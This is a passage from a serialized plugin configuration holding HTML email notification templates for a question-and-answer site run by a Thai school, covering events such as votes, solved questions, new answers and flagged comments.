1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; has published a question&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{question_}&quot;&gt;{question_title}&lt;/a&gt;\r\n{question_content}&lt;/p&gt;\r\n\r\n&lt;div style=&quot;padding: 10px 0 0;&quot;&gt;&lt;a class=&quot;btn&quot; style=&quot;color: #fff; border-radius: 3px; text-decoration: none; background-color: #51b3ff; padding: 10px 20px; font-size: 14px; font-family: Arial, sans-serif;&quot; href=&quot;{question_edit_url}&quot;&gt;Edit Question&lt;/a&gt;&lt;/div&gt;&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:15:\"question_voteup\";a:7:{s:4:\"name\";s:17:\"Question voted up\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:30:\"Question voted up - {site_url}\";s:4:\"html\";s:1673:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; voted up on this question.&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{answer_url}&quot;&gt;{question_title}&lt;/a&gt;\r\n{question_content}&lt;/p&gt;\r\n&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:17:\"question_votedown\";a:7:{s:4:\"name\";s:19:\"Question voted down\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:32:\"Question voted down - {site_url}\";s:4:\"html\";s:1675:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; voted down on this question.&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{answer_url}&quot;&gt;{question_title}&lt;/a&gt;\r\n{question_content}&lt;/p&gt;\r\n&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:15:\"question_solved\";a:7:{s:4:\"name\";s:15:\"Question solved\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:28:\"Question solved - {site_url}\";s:4:\"html\";s:1677:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; marked a question as solved.&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{question_url}&quot;&gt;{question_title}&lt;/a&gt;\r\n{question_content}&lt;/p&gt;\r\n&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:17:\"question_unsolved\";a:7:{s:4:\"name\";s:17:\"Question unsolved\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:30:\"Question unsolved - {site_url}\";s:4:\"html\";s:1679:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; marked a question as unsolved.&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{question_url}&quot;&gt;{question_title}&lt;/a&gt;\r\n{question_content}&lt;/p&gt;\r\n&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:20:\"new_answer_submitted\";a:7:{s:4:\"name\";s:20:\"New answer submitted\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:33:\"New answer submitted - {site_url}\";s:4:\"html\";s:1965:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;{user_name} has submitted an answer&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{answer_url}&quot;&gt;{answer_title}&lt;/a&gt;\r\n{answer_content}&lt;/p&gt;\r\n\r\n&lt;div style=&quot;padding: 10px 0 0;&quot;&gt;&lt;a class=&quot;btn&quot; style=&quot;color: #fff; border-radius: 3px; text-decoration: none; background-color: #51b3ff; padding: 10px 20px; font-size: 14px; font-family: Arial, sans-serif;&quot; href=&quot;{answer_edit_url}&quot;&gt;Edit/Approved Answer&lt;/a&gt;&lt;/div&gt;&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:20:\"new_answer_published\";a:7:{s:4:\"name\";s:20:\"New answer published\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:33:\"New answer published - {site_url}\";s:4:\"html\";s:1987:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; has published an answer&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{answer_url}&quot;&gt;{question_title}&lt;/a&gt;\r\n{answer_content}&lt;/p&gt;\r\n\r\n&lt;div style=&quot;padding: 10px 0 0;&quot;&gt;&lt;a class=&quot;btn&quot; style=&quot;color: #fff; border-radius: 3px; text-decoration: none; background-color: #51b3ff; padding: 10px 20px; font-size: 14px; font-family: Arial, sans-serif;&quot; href=&quot;{answer_edit_url}&quot;&gt;Edit Answer&lt;/a&gt;&lt;/div&gt;&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:13:\"answer_voteup\";a:7:{s:4:\"name\";s:15:\"Answer voted up\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:28:\"Answer voted up - {site_url}\";s:4:\"html\";s:1667:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; voted up on this answer.&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{answer_url}&quot;&gt;{answer_title}&lt;/a&gt;\r\n{answer_content}&lt;/p&gt;\r\n&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:15:\"answer_votedown\";a:7:{s:4:\"name\";s:17:\"Answer voted down\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:30:\"Answer voted down - {site_url}\";s:4:\"html\";s:1669:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; voted down on this answer.&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{answer_url}&quot;&gt;{answer_title}&lt;/a&gt;\r\n{answer_content}&lt;/p&gt;\r\n&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:14:\"answer_comment\";a:7:{s:4:\"name\";s:14:\"Answer comment\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:27:\"Answer comment - {site_url}\";s:4:\"html\";s:1663:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; commented on answer.&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{comment_url}&quot;&gt;Comment Link&lt;/a&gt;\r\n{comment_content}&lt;/p&gt;\r\n&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:12:\"comment_flag\";a:7:{s:4:\"name\";s:12:\"Comment flag\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:25:\"Comment flag - {site_url}\";s:4:\"html\";s:1664:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; flagged your comment.&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{comment_url}&quot;&gt;Comment Link&lt;/a&gt;\r\n{comment_content}&lt;/p&gt;\r\n&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:14:\"comment_unflag\";a:7:{s:4:\"name\";s:14:\"Comment unflag\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:27:\"Comment unflag - {site_url}\";s:4:\"html\";s:1666:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; unflagged your comment.&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{comment_url}&quot;&gt;Comment Link&lt;/a&gt;\r\n{comment_content}&lt;/p&gt;\r\n&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:9:\"assign_to\";a:7:{s:4:\"name\";s:16:\"Invite to answer\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:34:\"Invitation for answer - {site_url}\";s:4:\"html\";s:2000:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, 